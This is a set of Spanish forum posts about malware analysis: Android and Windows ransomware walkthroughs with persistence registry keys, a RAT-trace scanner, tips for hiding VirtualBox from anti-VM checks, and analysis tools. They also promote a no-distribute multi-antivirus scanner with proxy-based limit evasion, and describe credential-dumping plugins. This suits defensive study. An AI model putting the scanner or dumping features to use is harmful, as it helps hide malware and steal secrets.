Nota_3: Las Librerias HtmlAgilityPack y Json.net vienen embebidas en el ejecutable.

PD_1: Si van a postear en otros foros, por favor no poner links de Adf.ly o Similares,...
PD_2: Si alguien puede agregar algun Mirror, para evitar alguna caida xD.
 
 
 
 PARA LOS DESCONFIADOS:
 
You are not allowed to view links. Register or Login

27
Análisis y desarrollo de malwares / Multi-Scanner v0.1 | by fudmario
« en: Mayo 28, 2015, 01:52:37 am »
Bueno aqui les dejo esta tonteria que hice en mis ratos libres,.xD
Es una version GUI de los scanner mas usados para analizar con diversos antivirus(o almenos los que supuestamente no envian muestras a los avs).
Para facilitarme al momento de parsear los resultados use las librerias: htmlagilitypack y Json.NET(Newtonsoft)




Caracteristicas Principales:


  • Soporte para Analizar en: viruscheckmate.com
  • Soporte para Analizar en: refud.me
  • Soporte para Analizar en: nodistribute.com |*
  • Soporte para Analizar en: v2.scan.majyx.net
  • Soporte de : Drag & Drop
  • Generador de Lista de Proxy, basado en proxy-list.org |**
  • Todas las configuraciones se guardan en My.Settings

 
*nodistribute: solo admite 4 scan por dia, pero eh agregado la opcion de scanear mediante un PROXY, para scan Ilimitados.
**Por defecto solo obtiene del Tipo: Elite(Solo genera este tipo de proxy, porque en las pruebas que hice, me dieron mejores resultados con este tipo de proxy)


Algunas Capturas:










Descarga: You are not allowed to view links. Register or Login
Contraseña: _by_fudmario_


Cualquier duda, sugerencia o error, favor de enviarme por MP o por SKYPE.


Saludos.

28
C# - VB.NET / [C#]NET.Reflector.v7.0[SC]
« en: Abril 01, 2015, 12:08:06 am »


Descarga: You are not allowed to view links. Register or Login
Contraseña: M-H



29
Seguridad / ScanRAT V2.6 Multi-tools by fudmario
« en: Marzo 05, 2015, 08:44:21 pm »
Aquí les dejo una actualización de esta herramienta, eh corregido algunos errores, he mejorado un poco el código, vi también que  ya no funcionaba el IP-TRACKER, entre otras cosas mejora de la Apariencia.
Aunque estaba pensando en quitar lo del ScanRAT, porque prácticamente lo deje sin actualizar con nuevos virus o alguna mejora significativa (por no decir Obsoleta/Simple  la forma de detección por los log’s que dejan los troyanos), decidí mantenerlo aún, ya que ese era su nombre original y bueno en parte ese propósito  de esta herramienta la de Analizar a un RAT o similares.
Tampoco eh añadido muchas de las opciones que tenía pensado añadir, porque es la primera vez que utilizo DOTNETBAR, cuando tenga una interfaz final voy a añadir todas las Opciones, que eh estado haciéndolo por separado.


 

VIDEOS:

ScanRAT v2 6 MultiTools by fudmario | Exe Inspector



ScanRAT v2.6 MultiTools by fudmario | USB Cleaner


Version Anterior Demo:
You are not allowed to view links. Register or Login




HERRAMIENTAS:
 
  • SCANRAT: Permite detectar si hay rastros de los RAT’s  más comunes  en nuestra PC, esto mediante ficheros que generalmente deja algunos troyanos.
     
  • LIMPIADOR DE USB: Nos permite Buscar gusanos VBS en nuestro USB que ocultan carpetas  o crean Accesos directos de las mismas, con la opción de Revisar busca archivos VBS y .LNK y la Opción de Reparar nos permite Eliminar Esos Archivos, también tiene un botón para des ocultar Ficheros escondidos.
       
  • VISOR DE PROCESOS: Nos permite visualizar los procesos en ejecución en nuestro sistema, además nos permite obtener los módulos cargados por un determinado proceso, incluyendo tres formas de  finalizar proceso, bloqueador de procesos, marcador de proceso para poder visualizar o encontrar fácilmente un proceso.
       
  • INICIO DE WINDOWS: Nos permite visualizar las aplicaciones que se ejecutan al Iniciar Windows en las rutas más comunes en: HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE Y LA CARPETA DE INICIO DE WINDOWS. También nos permite visualizar  los servicios con los que inicia, con la opción de Iniciar, detener, pausar o continuar un servicio. Y la opción de visualizar el archivo host, para bloquear un dominio o ver si existe alguna modificación en el archivo host.
       
  • PROTECTOR DE CARPETA: Nos permite bloquear carpetas mediante permisos, un  uso sencillo es la de proteger aplicaciones que son detectadas como virus por los Antivirus (sé que es una tontería, pero bueno).
       
  • CAPTURADOR  DE PROCESOS: Nos permite Monitorizar los Proceso que son ejecutados.
  • CAPTURADOR  DE EVENTOS: Nos permite obtener las modificaciones en el sistema, mediante FILESYSTEMWATCHER,  detecta: Creados, Eliminados, Modificados, Renombrados con la Opción de Incluir subdirectorios.
     
  • EXE INSPECTOR: Nos permite encontrar cadenas de textos en ejecutables  con la opción de Copiar al Portapapeles, también nos permite Filtrar para encontrar Rutas de archivos, Direcciones de Correo Electrónico, Link, esto lo podemos utilizar cuando desempaquetamos ejecutables que usan PACKER o si dumpeamos un proceso,.. etc.
  • DESOFUSCADOR DE VBS: Con esta herramienta nos permite desofuscar   archivos vbs, demo en el video de abajo.
     
  • CONEXIONES TCP: Nos permite enumerar conexiones TCP, con la opción de Localizar IP, para el localizador de IP, trabaja con WHO.IS, IPFINDER y GOOGLEMAP.

     

Para el correcto funcionamiento, debes ejecutarlo como administrador


Principal


ScanRAT


USB Cleaner



Process Viewer


Process Lock




Windows Start


Folder Protector


Process Capture




FileSystemWatcher



Exe Inspector
Dump String


Url Dump


VBS Deobuscate



TCP CONNECTIONs





Settings



You are not allowed to view links. Register or Login




Descarga:

You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login


Contraseña:  byfudmario


 

 
Para Cualquier error o sugerencias que encuentren en el Programa, pueden enviarme mensaje por Skype.

30

Hace un par de semanas me preguntaron sobre esto, así que me saque algo de tiempo y decidi hacer este mini-tutorial para todos, y bueno veremos algunas formas para poder identificar APK's maliciosas y tambien el uso de aplicaciones que nos ayudaran en este proceso.

Comencemos...

¿Qué es una APK?

Cita de: Wikipedia
Un archivo con extensión .apk (Application PacKage File) es un paquete para el sistema operativo Android. Este formato es una variante del formato JAR de Java y se usa para distribuir e instalar componentes empaquetados para la plataforma Android...

Un archivo .apk normalmente contiene lo siguiente:

    AndroidManifest.xml
    classes.dex
    resources.arsc
    res (carpeta)
    META-INF (carpeta)
    lib (carpeta)
   
El Formato APK es básicamente un archivo comprimido ZIP con diferente extensión por lo cual pueden ser abiertos e inspeccionados usando un software archivador de ficheros como 7-Zip, Winzip, WinRAR o Ark.




  • AndroidManifest.xml
Es un archivo XML codificado como XML binario que nos muestra los datos de la aplicación(Actividades, permisos, servicios, etc.)


  • classes.dex
Aquí se encuentra el código de la aplicación compilado en un el formato que interpreta la maquina virtual de Dalvik


  • resources.arsc
Aquí se encuentran todos los recursos pre-compilados de la aplicación.


  • res
En esta carpeta estan  los recursos de la aplicación.


  • META-INF
En esta carpeta encuentran los certificados de la aplicación.

Utilizaremos una muestra disponible en Contagio Mobile
¿Qué es Simplocker?

Cita de: ESET
Simplocker es un troyano apuntado a móviles, uno de la los primeros de esta clase que tiene por objetivo los dispositivos móviles con Android. Este código malicioso explora la tarjeta SD residente en busca de ciertos tipos de archivos (.jpeg, .jpg, .png, .bmp, .gif, .pdf, .doc, .docx, .txt, .avi, .mkv, .3gp, .mp4), encripta estos archivos utilizando AES, y luego demanda un rescate de parte del usuario a cambio de la descripción de esos archivos vulnerados. El resultado determina que hasta que el rescate sea pagado, los usuarios no podrán acceder a su archivos personales (fotografías, descargas, canciones , etc.).

Nuestro punto de inicio será el archivo AndroidManifest.xml, este archivo nos mostrará que es lo que va a hacer, si intentamos leer el contenido de este archivo no será legible, para poder leerlo correctamente podemos usar: "AXMLPrinter2" o "xml-apk-parser".

AXMLPrinter2: Obtiene el XML desde el archivo xml binario.
Código: You are not allowed to view links. Register or Login
Uso: java -jar AXMLPrinter2.jar <Archivo xml binario>xml-apk-parser: Obtiene el XML directamente desde la APK
Código: You are not allowed to view links. Register or Login
Uso: java -jar APKParser.jar <Archivo apk>




El Archivo AndroidManifest:

  • Android:versionCode =  Indica la versión de nuestra aplicación
  • Android:versionName =  Indica la versión de nuestra aplicación mostrada al usuario
  • package = Es el nombre del paquete Java que contiene el elemento raíz de nuestra aplicación
  • uses-permission = Esto declara los permisos que necesita la aplicación para funcionar.
  • permission = Esto declara los permisos que las actividades o servicios que necesita.
  • application = Esto define nombre, actividades, icono, etc.
Contenido del Archivo AndroidManifest de Simplocker:

  • android.permission.INTERNET = Permite a las aplicaciones abrir sockets de red
  • android.permission.ACCESS_NETWORK_STATE = Permite que las aplicaciones accedan a información sobre redes
  • android.permission.READ_PHONE_STATE = Permite acceso de sólo lectura al estado del teléfono.
  • android.permission.RECEIVE_BOOT_COMPLETED = Permite que una aplicación para recibir el ACTION_BOOT_COMPLETED que se emite después de que el sistema termine de iniciarse.
  • android.permission.WAKE_LOCK = Permite el uso de PowerManager WakeLocks mantener procesador de dormir o la pantalla de oscurecimiento
  • android.permission.WRITE_EXTERNAL_STORAGE = Permite que una aplicación escriba en el almacenamiento externo
  • android.permission.READ_EXTERNAL_STORAGE = Admite una aplicación que lee de almacenamiento externo.
Ahora vamos a decompilar el proyecto:

Como al principio hemos dicho que basicamente se trata de un archivo comprimido con diferente extensión, usando WinRAR podriamos extraer el contenido y con el archivo classes.dex pasandolo por Dex2jar obtendriamos el codigo
DEX2JAR



JD-GUI:Decompiler(Haz Clic para ver el VIDEOGIF)

You are not allowed to view links. Register or Login

Otra alternativa sería usar(aunque es de pago) "AndroChef Java Decompiler", es bastante completo tu solo seleccionas tu apk y nos muestra todo el codigo decompilado.






CREANDO UN ENTORNO VIRTUAL:

Bueno para probar vamos a usar un Emulador para Android(yo usaré el Android SDK)

ANDROID VIRTUAL




Para instalar Aplicaciones utilizaremos el "adb.exe" ubicado en la carpeta "platform-tools"
el modo de uso es el Siguiente:

Código: You are not allowed to view links. Register or Login
adb.exe install <tu archivo .apk>
Instalando APK


Simplocker Instalado


Pantalla Principal


Archivos Encryptados




Referencias:
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Liberar los archivos encryptados:
You are not allowed to view links. Register or Login






Si te gusta y quieres compartirlo adelante, recuerda respetar el autor del Post.

31

Hola a todos, hoy vamos a ver un tipo de variante de Malware conocida como Ransomware, si bien esto no es nada nuevo este tipo de Malwares podrian ser muy daniños, veremos con un ejemplo como funciona y como podemos desinfectarnos.



¿Qué es  un Ransomware?[/B]


Cita de: Wikipedia
Un ransomware es un tipo de programa informático malintencionado que restringe el acceso a determinadas partes o archivos del sistema infectado, y pide un rescate a cambio de quitar esta restricción. Algunos tipos de ransomware encriptan los archivos del sistema operativo inutilizando el dispositivo y coaccionando al usuario a pagar el rescate.


Similares  lo que hacen es bloquear el escritorio(muchas veces cambiandolo desde el editor registro)  y mostrar en pantalla que simulan ser de alguna tipo de autoridad diciendo que se ha bloqueado el acceso al sistema por violacion de alguna ley, actividades ilegales, etc. Para luego pedir  dinero a cambio de poder acceder al sistema.



Entre las modificaciones que generalmente hacen:


  • Para evitar ser Eliminados, modifican valores en registro para que no se pueda iniciar en modo seguro(F8).
Código: You are not allowed to view links. Register or Login
   
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\minimal
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

  • Restringir el uso de herramienta utilies  de Windows:
Código: You are not allowed to view links. Register or Login
REGEDIT(Editor de Registros), TASKMGR(Administrador de Tareas), CMD()
  • Tambien modificar el inicio("explorer.exe"):
Código: You are not allowed to view links. Register or Login
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon


    Aqui podemos ver como es un Builder de este  tipo de Malware:



    Muchos se preguntarán: ¿Es posible desinfectarse?.

    Depende del tipo de Variante de este Malware, podria llegar a solucionarse o no.

    Hoy vamos a ver el comportamiento de una de estas variantes de Malware.

    Aqui la muestra:




    Actualmente es detectado segun VirusTotal => [45/52]




    Decir que al intentar pasarlo por .Reflector se puede notar que  esta empaquetado(SmartAssembly 6.6.3.41), podriamos intentar desempaquetarlo,para luego mediante Reversing obtener mucha más info(pero solo veremos que es lo que hace).



    Lo siguiente que haremos será ejecutar en un entorno Controlado:

    lo ejecutaré en mi VirtualBox, con WinXP(previamente hice un .backup de la Misma).



    Vemos que despues de ejecutar nos muestra el siguiente mensaje.










    Para una Nueva extension, crea los siguientes Valores:


    Código: You are not allowed to view links. Register or Login
    HKLM\SOFTWARE\Classes\.LOCKED\: "BQBDQKUSAWICLUB"
    HKLM\SOFTWARE\Classes\BQBDQKUSAWICLUB\: "LOCKED"
    HKLM\SOFTWARE\Classes\BQBDQKUSAWICLUB\DefaultIcon\: "C:\DOCUME~1\User\CONFIG~1\Temp\NBj27xt2TijUNe8.exe,0"
    HKLM\SOFTWARE\Classes\BQBDQKUSAWICLUB\shell\open\command\: "C:\DOCUME~1\User\CONFIG~1\Temp\NBj27xt2TijUNe8.exe"

    Autoinicio:

    Código: You are not allowed to view links. Register or Login
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Alcmeter: "C:\DOCUME~1\User\CONFIG~1\Temp\NBj27xt2TijUNe8.exe"





    y que comienza a cifrar todo los archivos con extensiones conocidas(Dumpeando el proceso tambien se puede observar las extensiones afectadas).

    Código: You are not allowed to view links. Register or Login
    *.exe *.zip *.rar *.7z *.tar *.gzip *.jpg *.jpeg *.tif *.psd *.cdr *.dwg *.max *.bmp *.gif *.png *.doc *.docx *.xls *.xlsx *.ppt *.pptx *.txt *.pdf *.djvu *.htm *.html *.mdb *.cer *.p12 *.pfx *.kwm *.pwm *.1cd *.md *.mdf *.dbf *.odt *.vob *.iso *.ifo *.csv *.torrent *.mov *.m2v *.3gp *.mpeg *.mpg *.flv *.avi *.mp4 *.wmv *.divx *.mkv *.mp3 *.wav *.flac *.ape *.wma *.ac3 *.epub *.eps *.ai *.pps *.pptm *.accdb *.pst *.dwg *.dxf *.dxg *.wpd *.dcr *.kdc *.p7b *.p7c *.raw *.cdr *.qbb *.indd *.qbw

    Ademas cambia el modo como se abre los archivos.



    Ficheros que se Crean


    ya sabemos con funciona, ahora si las 2 preguntas mas importantes:


    ¿Cómo desinfectarse?.

    Primero vamos a borrar todo rastro de este Malware, vamos a regedit y eliminamos el autoinicio, y tambien desde "Classes" para quitar la extension .LOCKED()

    ¿Comó Desbloquear los Archivos?


    Pues gracias a You are not allowed to view links. Register or Login, que nos brinda herramientas gratuitas, utilizaremos una de ellas "xoristdecryptor" una herramienta bastante util que combate con este tipo de Malware's con la que se puede llegar a decifrar los ficheros. La pueden descargar desde:


     You are not allowed to view links. Register or Login









    Y listo con esto ya tenemos de nuevo funcionando nuestro Sistema.


    Código: You are not allowed to view links. Register or Login
    [I]Eso es todo amigos,trate de ser lo más claro en la explicación y espero que sirva de ayuda, cualquier duda, sugerencia, critica, aqui estamos para ayudar. [/I]
     

     Recomendaciones:

     
    •   Mantener siempre un antivirus actualizado, si bien no siempre es efectivo esto nos podrá ayudar evitar posibles infecciones.
    • Cualquier Fichero descargado de la Red( Keygen, crack o similares), en lo posible ejecutarlo en un entorno Controlado, Maquinas Virtuales(VBOX,VMWARE,ETC) o Sandbox(si bien no son 100% seguros pero esto podria llegar a minimizará el daño a tu PC).




    Autor: Fudmario.


    PD: "Si alguien decide llevar este tutorial a otros lados, se pide respetar el Autor y la Fuente de la misma".

    32
    Seguridad / ScanRat v2 | Multi-Tools by fudmario
    « en: Junio 29, 2014, 03:58:21 pm »
    Hola a todos, aquí les dejo la versión 2.0 del ScanRat, en esta versión no he añadido ningún RAT a la lista, solo he implementado algunas herramientas, algo simple que nos ayudará a detectar las modificaciones de algun malware en caso de que no se encuentre en la lista de detecciones.




    Caracteristicas:


    • Detector de Rat's:
      Nos permite detectar si tenemos algun rastro de Rat/Worms en nuestra PC en esta versión se ha implementado la opcion de limpiar los rastros.

      Lista de Detecciones(1/2 Deteccion Simple 2/2 Completa):
      • Spynet v2.6         [2/2]
      • DarkCometRat v5.3.1  [1/2]
      • Bozok Rat 1.4.1      [1/2]
      • Bozok Rat 1.4.3     [1/2]
      • Bozok Rat 1.5       [1/2]
      • Cybergate v1.07.5   [2/2]
      • CyberSpread-v-2.0   [2/2]
      • Cybergate v1.04.0   [2/2]
      • Cybergate v1.02.0   [2/2]
      • Cybergate v1.01.18  [2/2]
      • Cybergate v1.00.1   [2/2]
      • Cybergate v3.4.2.2  [2/2]
      • Worm v2.4 Hacker_Pan [2/2]
      • L6-Rat Beta 1        [2/2]
      • nJRat v0.6.4         [2/2]
      • nJRat v0.7d          [2/2]
      •   H-Worm Plus by Houdini  [2/2]
    • USB:
      Nos permite analizar nuestro pendrive en busca de worm, tambien tiene las opciones de: Quitar atributos de ocultos,Eliminar archivos con extensión (.lnk,.vbs,vbe), inhabilitar el Autorun.Inf.
    • Inicio de Windows:

      Nos permite detectar las aplicaciones  de inicio de Windows(HKCU,HKLM,StartUp file), con la opcion de abrir la ruta del Fichero, Eliminar el Valor del Registro.
    • Visor & Capturador de Procesos:

      Nos permite obtener los procesos ejecutados y la opción de Matar el Proceso de diferentes formas, tambien nos permite capturar aplicaciones que se ejecutan.
    • Visor de Eventos:

      Captura Eventos de Creación, Modificación, Eliminación & Cambio.
    • Bloqueo/Desbloqueo de Carpetas:

      Bloqueay desbloquea accesos  a carpetas.
    DEMO:


    Requerimientos:

    • .NetFramework 2 o Superior.
    • .Ejecutar con Privilegios Adminstrativos.
    • Compatible:Win7 & Win8


    Descarga: You are not allowed to view links. Register or Login
    MD5 = 39110406004a7abf788acb999dc5cdb8

    Para descarga directa, desmarcar: "Use our download manager and get recommended downloads"

    33
    Seguridad / ScanRat v1.3 | by fudmario
    « en: Mayo 03, 2014, 11:17:38 pm »
    Hola amigos, eh realizado algunas modificaciones y añadidos un Par de RATs y algunos Worms a la lista de detecciones entre otras cosas.







    Para los que no lo conocen aquí la Info:
    Citar
    Generalmente los servers de los diferentes Rat's ,al generar el server muchas veces se puede randomizar cosas como: Claves de StarUp, Mutex, Ruta de instalación,etc... pero en algunas cosas matienen constantes como archivos, Valores en registro.

    Lo que hace esta Herramienta es básicamente es buscar esas constantes(en esta versión usamos los nombre ficheros del keylogger, rutas usuales que dejan los Rat's) y si coincide indica en el log a que rat se trata.
    Tambien aclarar, que debido a publicar los codigos fuentes de los Rat suelen ser Rippeados y por lo tanto, en esta herramienta puede detectarlo como otro RAT.(Ej: L6-Rat Beta 1 es detectado como njRAT v0.6.4 ).

    Si quieren que agregue más RATs a la lista de  deteccion, comentar en el post o enviar por MP






    TEST: njRAT by njq8



    TEST: H-WORM by HOUDINI.




    Para los desconfiados:

    VirusScan

    You are not allowed to view links. Register or Login




    Descarga: You are not allowed to view links. Register or Login

    Contraseña: byfudmario



    34
    Tutoriales y Manuales de Malwares / Anti-Anti Virtuales by fudmario
    « en: Abril 14, 2014, 08:50:19 am »
    Anti-Anti Virtuales by fudmario

    Uno de los problemas que existen al momento de Realizar Análisis de Malware, es cuando nos encontramos con diversas técnicas que utilizadas para evitar ser analizados, entre ellas:


    • Verificar si estan cargadas ciertas DLLs (Ej: SandBoxie => SbieDll.dll).
    • Verificar la Existencia de algunos ficheros(Ej: Driver-VirtualBox => VBoxMouse.sys).
    • Verificar si algunos procesos estan en ejecución(Ej: VBoxService.exe, VMWareUser.exe, Wireshark.exe, etc.).
    • Verificar el identificador del Disco Principal.
    • Deteccion de Breakpoints, Presencia de Anti-Debuggers, etc...


    En SI, un sin fin de formas que utilizan los malware's para evitar ser analizados.

    En esta primera parte vamos a ver como modificar nuestro entorno Virtual, esto para eludir la técnicas que generalmente tienen ciertos Malware's para evitar ser ejecutados en entornos Controlados(suena repetitivo xD).

    Vamos a modificar nuestra Maquina Virtual de "Virtual Box", al igual que se puede dejar indectectables los Malware's, tambien volveremos indetectable a nuestra Maquina Virtual por así decirlo.

    Comencemos:

    Parte 1:
    En esta parte renombraremos ficheros, valores en registro, teniendo en cuenta que cada modificación debe realizarse verificando que no dañe nuestra VM.

    Técnica #1 "VirtualBox Shared Folders Minirdr NP"

    Comprueba si esta cargada esta DLL: "VBoxMRXNP.dll"

    Lo que haremos será renombrarla: añadirle un caracter al el nombre o randomizar el nombre, creo que si randomizamos será muy dificil que sea detectado.
    A por ello:

    Cambiaremos el nombre del Fichero:

    Código: You are not allowed to view links. Register or Login
    'Ruta del Fichero:
    %WinDir%\system32\VBoxMRXNP.dll
    'Por:
    %WinDir%\system32\POIUYT.dll 'Randomizar el Nombre del Fichero.

    Y tambien lo modificaremos desde el Editor de Registro para que no cause ningun error.

    Código: You are not allowed to view links. Register or Login
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VBoxSF\NetworkProvider






    Técnica #2 "VBoxMouse.sys"

    De la misma forma anteriormente mostrada, renombraremos el nombre del fichero.

    Código: You are not allowed to view links. Register or Login
    %WinDir%\system32\drivers\VBoxMouse.sys

    %WinDir%\system32\drivers\FLGKHJ.sys

    desde el Editor de Registro, tambien modificaremos, en las siguientes rutas:

    Código: You are not allowed to view links. Register or Login
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse

    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\VBoxMouse
    En ImagePath, cambiaremos:

    Código: You are not allowed to view links. Register or Login
    System32\DRIVERS\VBoxMouse.sy
    por:
    System32\DRIVERS\FLGKHJ.sys





    Técnica #3 "vboxservice.exe"

    Más de lo mismo a renombrarlo.

    Código: You are not allowed to view links. Register or Login
    %WinDir%\system32\vboxservice.exe
    por

    %WinDir%\system32\RNDSRVC.exe

    Y modificarlo tambien en el Editor de Registro.
    Código: You are not allowed to view links. Register or Login
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VBoxService
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\VBoxService
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VBoxService

    Vamos a modificar en ImagePath por el nuevo nombre del Fichero.






    Técnica #4 "VirtualBox Guest Additions"

    Cambiaremos el Nombre de la siguente Clave:

    Código: You are not allowed to view links. Register or Login
    HKEY_LOCAL_MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions

    HKEY_LOCAL_MACHINE\SOFTWARE\Oracle\RANDOMGUESTADDITIONS_fudmario





    Parte 2:
    Esta parte es similar al anterior hasta cierto punto, en la anterior parte modificamos por así decirlo permanentemente, pero en esta parte no se puede  ya que al reiniciar se restablecerá las modificaciones realizadas ya que si no se podria dañar nuestra VM.


    Técnica #5 "HARDDISK"
    Modificaremos en el Editor de Registro:
    Código: You are not allowed to view links. Register or Login
    HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
    en Identifier:
    VBOX HARDDISK
    por Cualquiera otra cosa.



    Técnica #6  , Técnica #7   "SystemBiosVersion" | "VideoBiosVersion"


    Código: You are not allowed to view links. Register or Login
    HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System
    Modificaremos en informacion de Valor, de SystemBiosVersion y VideoBiosVersion por cualquier cosa.


    Técnica #8 "Verificando el Tamaño del Disco"
     En ocaciones tambien puede pasar que el Malware  Revise si el tamaño de disco es menor a un valor dado, que generalmente son  20GB, 30GB ó 50GB esta técnica no se usa generalmente, pero hay les dejo el dato para que le puedan agregar en Expansion Dinamica a el Disco un Tamaño mayor a eso.
     


    Test1:

    ANTES:



    AHORA:




    Test2:




    Hasta el momento solo se me ocurren esas, si alguien conoce otras técnica, comenten en el post para seguir añadiendo. Esto tambien Aplica a VMWare, Qemu, pero prefiero a VBOX ya que es gratuito.


    Autor: fudmario

    "Si deciden llevar esto a otros lados, se pide respetar la fuente y el autor de la Misma"

    35

    En este Post vamos a estar añadiendo Herramientas destinadas al Análisis de Malware.
    Tambien sabemos que existen herramientas que tienen diversas funciones y entre ellas el Análisis de Malware, las cuales tambien se incluiran, con el enfoque principal-> Análisis de Malware.


    Volatility Framework

    Volatility es un Framework con un conjunto de herramientas desarrolladas enteramente en Python con licencia GNU. Este Framework esta pensado para extraer de una imagen de un disco los datos volátiles que estaban en memoria RAM. Estas técnicas de extracción están pensadas para que no dependan del sistema operativo del investigador, es decir podemos utilizar Windows y/o Linux.
    Existen diversas herramientas para extraer la memoria RAM, una de las formas fue mostrada en este post:
    You are not allowed to view links. Register or Login





    Código: You are not allowed to view links. Register or Login
    Supported Plugin Commands:

    apihooks        Detect API hooks in process and kernel memory
    atoms           Print session and window station atom tables
    atomscan        Pool scanner for _RTL_ATOM_TABLE
    bioskbd         Reads the keyboard buffer from Real Mode memory
    callbacks       Print system-wide notification routines
    clipboard       Extract the contents of the windows clipboard
    cmdscan         Extract command history by scanning for _COMMAND_HISTORY
    connections     Print list of open connections [Windows XP and 2003 Only]
    connscan        Scan Physical memory for _TCPT_OBJECT objects (tcp connections)
    consoles        Extract command history by scanning for _CONSOLE_INFORMATION
    crashinfo       Dump crash-dump information
    deskscan        Poolscaner for tagDESKTOP (desktops)
    devicetree      Show device tree
    dlldump         Dump DLLs from a process address space
    dlllist         Print list of loaded dlls for each process
    driverirp       Driver IRP hook detection
    driverscan      Scan for driver objects _DRIVER_OBJECT
    dumpcerts       Dump RSA private and public SSL keys
    dumpfiles       Extract memory mapped and cached files
    envars          Display process environment variables
    eventhooks      Print details on windows event hooks
    evtlogs         Extract Windows Event Logs (XP/2003 only)
    filescan        Scan Physical memory for _FILE_OBJECT pool allocations
    gahti           Dump the USER handle type information
    gditimers       Print installed GDI timers and callbacks
    gdt             Display Global Descriptor Table
    getservicesids  Get the names of services in the Registry and return Calculated SID
    getsids         Print the SIDs owning each process
    handles         Print list of open handles for each process
    hashdump        Dumps passwords hashes (LM/NTLM) from memory
    hibinfo         Dump hibernation file information
    hivedump        Prints out a hive
    hivelist        Print list of registry hives.
    hivescan        Scan Physical memory for _CMHIVE objects (registry hives)
    hpakextract     Extract physical memory from an HPAK file
    hpakinfo        Info on an HPAK file
    idt             Display Interrupt Descriptor Table
    iehistory       Reconstruct Internet Explorer cache / history
    imagecopy       Copies a physical address space out as a raw DD image
    imageinfo       Identify information for the image
    impscan         Scan for calls to imported functions
    kdbgscan        Search for and dump potential KDBG values
    kpcrscan        Search for and dump potential KPCR values
    ldrmodules      Detect unlinked DLLs
    lsadump         Dump (decrypted) LSA secrets from the registry
    machoinfo       Dump Mach-O file format information
    malfind         Find hidden and injected code
    mbrparser       Scans for and parses potential Master Boot Records (MBRs)
    memdump         Dump the addressable memory for a process
    memmap          Print the memory map
    messagehooks    List desktop and thread window message hooks
    mftparser       Scans for and parses potential MFT entries
    moddump         Dump a kernel driver to an executable file sample
    modscan         Scan Physical memory for _LDR_DATA_TABLE_ENTRY objects
    modules         Print list of loaded modules
    mutantscan      Scan for mutant objects _KMUTANT
    patcher         Patches memory based on page scans
    printkey        Print a registry key, and its subkeys and values
    privs           Display process privileges
    procexedump     Dump a process to an executable file sample
    procmemdump     Dump a process to an executable memory sample
    pslist          Print all running processes by following the EPROCESS lists
    psscan          Scan Physical memory for _EPROCESS pool allocations
    pstree          Print process list as a tree
    psxview         Find hidden processes with various process listings
    raw2dmp         Converts a physical memory sample to a windbg crash dump
    screenshot      Save a pseudo-screenshot based on GDI windows
    sessions        List details on _MM_SESSION_SPACE (user logon sessions)
    shellbags       Prints ShellBags info
    shimcache       Parses the Application Compatibility Shim Cache registry key
    sockets         Print list of open sockets
    sockscan        Scan Physical memory for _ADDRESS_OBJECT objects (tcp sockets)
    ssdt            Display SSDT entries
    strings         Match physical offsets to virtual addresses (may take a while, VERY verbose)
    svcscan         Scan for Windows services
    symlinkscan     Scan for symbolic link objects
    thrdscan        Scan physical memory for _ETHREAD objects
    threads         Investigate _ETHREAD and _KTHREADs
    timeliner       Creates a timeline from various artifacts in memory
    timers          Print kernel timers and associated module DPCs
    unloadedmodules Print list of unloaded modules
    userassist      Print userassist registry keys and information
    userhandles     Dump the USER handle tables
    vaddump         Dumps out the vad sections to a file
    vadinfo         Dump the VAD info
    vadtree         Walk the VAD tree and display in tree format
    vadwalk         Walk the VAD tree
    vboxinfo        Dump virtualbox information
    vmwareinfo      Dump VMware VMSS/VMSN information
    volshell        Shell in the memory image
    windows         Print Desktop Windows (verbose details)
    wintree         Print Z-Order Desktop Windows Tree
    wndscan         Pool scanner for tagWINDOWSTATION (window stations)
    yarascan        Scan process or kernel memory with Yara signatures

    Descargas:

    You are not allowed to view links. Register or Login

    Web:
    You are not allowed to view links. Register or Login





    Buster Sandbox Analyzer

    BSA, herramienta diseñada para analizar cambios que ocurren en el sistema, basada en Sandboxie permitiendo ejecutar ficheros en un ambiente controlado.
    Una de las Principales caracteristicas es que hace hook a la funcion NtQuerySystemInformation(ssdt Hook)

    Compatible con la version 3.76 de Sandboxie, recientemente se fixeo la Injection DLL en la version 4.09.1 la cual causaba la incompatibilidad con BSA, aun no es al 100% Compatible,tambien requiere WinPCap.





    Ejemplo de Reporte:




    Descargas:

    BSA

    You are not allowed to view links. Register or Login
    You are not allowed to view links. Register or Login

    SANDBOXIE

    You are not allowed to view links. Register or Login

    WinPCap

    You are not allowed to view links. Register or Login

    Web:

    You are not allowed to view links. Register or Login




    PeFrame
    [/B]

    PEframe es una herramienta OPEN SOURCE, ideal para el Análisis Estático de Malware.




    USO:
           
    Código: You are not allowed to view links. Register or Login
    peframe <opt> <file>
    OPCIONES:

    Código: You are not allowed to view links. Register or Login
    -h      --help          This help
    -a      --auto          Show Auto analysis
    -i      --info          PE file attributes
            --hash          Hash MD5 & SHA1
            --meta          Version info & metadata
            --peid          PE Identifier Signature
            --antivm        Anti Virtual Machine
            --antidbg       Anti Debug | Disassembler
            --sections      Section analyzer
            --functions     Imported DLLs & API functions
            --suspicious    Search for suspicious API & sections
            --dump          Dumping all the information
            --strings       Extract all the string
            --file-url      Extract File Name and Url
            --file-verbose  Discover potential file name
            --hexdump       Reverse Hex dump
